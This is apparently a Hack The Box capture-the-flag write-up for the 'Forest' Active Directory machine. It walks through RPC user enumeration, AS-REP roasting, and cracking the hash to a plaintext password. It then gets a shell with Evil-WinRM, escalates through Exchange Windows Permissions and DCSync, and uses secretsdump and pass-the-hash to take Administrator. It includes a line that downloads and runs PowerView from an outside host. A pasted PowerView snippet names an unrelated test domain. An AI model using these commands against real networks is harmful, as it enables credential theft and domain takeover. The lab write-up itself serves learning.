Forest

Quick Summary

Hey guys, here’s my write-up about Forest Box it was a great box and very realistic

started with enumerating users over RPC, attack Kerberos with AS-REP Roasting

and a privilege escalation is possible when our user is in Exchange Windows permissions security group

Recon

Nmap

Start with scanning all ports

nmap -p- 10.10.10.161 --min-rate=10000

then enumerate version

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-21 14:19 EET
Warning: 10.10.10.161 giving up on port because retransmission cap hit (10).
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.30s latency).
Not shown: 65505 closed ports
PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
5985/tcp  open     wsman
9389/tcp  open     adws
47001/tcp open     winrm
49664/tcp open     unknown
49665/tcp open     unknown
49666/tcp open     unknown
49667/tcp open     unknown
49671/tcp open     unknown
49676/tcp open     unknown
49677/tcp open     unknown
49684/tcp open     unknown
49703/tcp open     unknown
49924/tcp open     unknown

nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 10.10.10.161

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-21 14:25 EET
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.38s latency).

PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-21 12:36:15Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf       .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/21%Time=5F9028C8%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m36s, deviation: 4h02m32s, median: 10m34s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-10-21T05:38:46-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-10-21T12:38:45
|_  start_date: 2020-10-21T11:54:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 293.67 seconds

looks like we are dealing with a domain controller

DNS Enumeration

can resolve htb.local and forest.htb.local from this DNS server

dig any @10.10.10.161 htb.local

; <<>> DiG 9.16.2-Debian <<>> any @10.10.10.161 htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55034
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 3ccc9f26efdc3210 (echoed)
;; QUESTION SECTION:
;htb.local.			IN	ANY

;; ANSWER SECTION:
htb.local.		600	IN	A	10.10.10.161
htb.local.		3600	IN	NS	forest.htb.local.
htb.local.		3600	IN	SOA	forest.htb.local. hostmaster.htb.local. 100 900 600 86400 3600

;; ADDITIONAL SECTION:
forest.htb.local.	3600	IN	A	10.10.10.161

;; Query time: 208 msec
;; SERVER: 10.10.10.161#53(10.10.10.161)
;; WHEN: Wed Oct 21 18:38:38 EET 2020
;; MSG SIZE  rcvd: 150

SMB Enumeration

Since we have netbios-ssn open on port 139 let’s run smbmap and see what we get. If you’re not on kali you can get smbmap from here

smbmap -H 10.10.10.161

[+] Finding open SMB ....
[+] User SMB session establishd on 10.10.10.161...
[+] IP: 10.10.10.161:445        Name: 10.10.10.161                                      
        Disk                                                    Permissions
        ----                                                    -----------
[!] Access Denied

I also tried smbclient but got nothing

smbclient -N -L //10.10.10.161

Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

RPC Enumeration

Here, we can see MSRPC port 135 is open so we can enumerate information out of AD using rpcclient and null authentication

rpcclient -U "" -N 10.10.10.161 to get a list of users we useenumdomusers

rpcclient -U "" -N 10.10.10.161

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

and we can list groups also

rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]

AS-REP Roasting

So what is AS-REP Roasting attack:

technique against Kerberos that allows password hashes to be retrieved for users that do not require pre-authentication. If the user has “Do not use Kerberos pre-authentication” enabled, then an attacker can recover a Kerberos AS-REP encrypted with the users RC4-HMAC’d password and he can attempt to crack this ticket offline.

By default, Do Not Require Pre-Authentication is disabled for the domain user.

I have a list of accounts from my RPC enumeration above.

cat users

svc-alfresco
sebastien
lucinda
andy
mark
santi
Administrator

now we can use GetNPUsers.py from Impacket to try to get a hash for each user, and I find one for the svc-alfresco account:

GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/ -usersfile users

$krb5asrep$23$svc-alfresco@HTB:5b3dd5b04029f657ab282c0819f4db32$9d31baa165064b2f1bbdd08c710f1dff4f146a8fbb35d6ad96157388b6821845346cf135331baf023a08f42da56597dea93859534bcec0a4e2830ad03faf667d231bb6cedb8992462c16c9e048aef8bb55ab7c3c45d53068b60b6b1677795664476eab5b01525cd23cb793b38fe8c357bcd635e938a46b20c6c596c41141a027fddb86b7480aa4df7ed91d91dd6a6efc94f400d2d159d52e9dc32be28ff50b6dbf6cdc228bf3e841073ea644d526fcb08e1472bb796ac7fa831598b73f8509d9bc5f68c14c17879df8dfbbf035ec4553d279c336cf4dca3b52c747a966fb6036
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

Crack Hash

Now I can use hashcat to break the hash:

we get password s3rvice

hashcat -m 18200 alfresco.kerb /usr/share/wordlists/rockyou.txt --force

$krb5asrep$23$svc-alfresco@HTB:4479d427f1cbdc2b8cf00073ad70141d$7236f2b86d80ff1cd2feac6f8e6b7b2438e353e9e90d7e3988212235bd14d81eaedeafe9f78a10159c08df738674896586f9c42badb21557db914ec859c16060de1d61687d4ec20f1b4e644520815518408858ee04c1b3aabecbbbe08030dbaf49a82bebacbad772e8af4bd51b31305d636bdfda8af8aa3886350cdbeb4cc90fb45691d68431248b0f236faae01016399580c2efa8a64dd59980c5987a78121dce24bd20016b46e79b515f32bfd125abe8265a285c30e403030613e8362bb3abb7d829364b2a3979f0a0b728835446a2c48e572190b46afcb23544552ee1dd55:s3rvice

WinRM

now we can use Evil-WinRM to connect to the box

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

From here I can grab user.txt:

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4e47a************************

Privesc to Administrator

Enumeration

I used SharpHound to collect data for BloodHound.

so what is BloodHound:

BloodHound is a tool for visualizing an Active Directory environment as a graph. This representation then offers all the power of graph theory to unravel new attack paths.

It can be used on engagements to identify different attack paths in Active Directory (AD), this encompasses access control lists (ACLs), users, groups, trust relationships and unique AD objects. The tool can be leveraged by both blue and red teams to find different paths to targets. The subsections below explain the different and how to properly utilize the different ingestors

let's upload it and invoke it

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls

    Directory: C:\Users\svc-alfresco\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/21/2020   3:58 PM          15312 20201021155757_BloodHound.zip
-a----       10/21/2020   3:58 PM          23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin

now we will download the results to my box actually evil-winrm made it easy through the command download

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20201021155757_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20201021155757_BloodHound.zip to 20201021155757_BloodHound.zip
                                                             
Info: Download successful!

you can install bloodhound from here

https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/

you can pull the data file to bloodhound or use upload button

In querries field you can request user, domain or group to see which is link with which.

for example svc-alfresco@htb.local right click on “shortest path to go here” and you will see domain user and group linked with svc-alfresco user.

I’ll click “Find Shorter Paths to Domain Admin”, and get the following graph:

Exchange and high privileges

Because my user is in Service Account, which is a member of Privileged IT Account, which is a member of Account Operators, it’s basically like my user is a member of Account Operators. And Account Operators has Generic All privilege on the Exchange Windows Permissions group.

I found this great article post-blog to abusing Exchange

in bloodhound we can click “Abuse Info” tab in the pop up that displays:

Grant DCSync Privileges

first we will add our user to "Exchange Windows Permissions" group

net group "Exchange Windows Permissions" svc-alfresco /add /domain

we will upload powerview and invoke it to complete our attack

iex(new-object net.webclient).downloadstring("http://10.10.16.136:8080/PowerView.ps1")

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLABdfm.a', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync

And I can see the user in the new group:

*Evil-WinRM* PS C:\> net group 'Exchange Windows Permissions'
Group name     Exchange Windows Permissions
Comment        This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.

Members
-------------------------------------------------------------------------------
svc-alfresco             
The command completed successfully.

I run secretsdump.py to get hashes:

secretsdump.py svc-alfresco:s3rvice@10.10.10.161

Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...[snip]...
[*] Cleaning up... 

Shell

evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator

And we owned root ! That’s it ,

Feedback is appreciated !